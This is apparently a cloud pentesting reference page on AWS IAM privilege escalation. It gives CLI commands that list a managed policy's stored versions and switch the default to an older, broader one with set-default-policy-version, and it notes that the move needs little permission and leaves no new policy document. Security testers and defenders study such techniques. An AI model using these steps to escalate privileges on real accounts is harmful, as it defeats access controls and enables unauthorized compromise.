A managed policy may already carry an older, broader version that is no longer the default. iam:SetDefaultPolicyVersion activates any stored version, so if a policy attached to you has a permissive non-default version in its history, you switch to it without writing a new document.
List versions and switch#
aws iam list-policy-versions --policy-arn arn:aws:iam::<acct>:policy/<policy>
# find a version whose document is broader than the current default
aws iam set-default-policy-version \
--policy-arn arn:aws:iam::<acct>:policy/<policy> --version-id v2
Exploitation notes#
- This needs only
iam:SetDefaultPolicyVersion, a narrower permission thanCreatePolicyVersion, and leaves no new policy document behind. - Inspect each stored version's document with
get-policy-versionto find the most permissive one before switching.
Tools#
- AWS CLI (
iam list-policy-versions/set-default-policy-version). - Pacu (
iam__privesc_scan).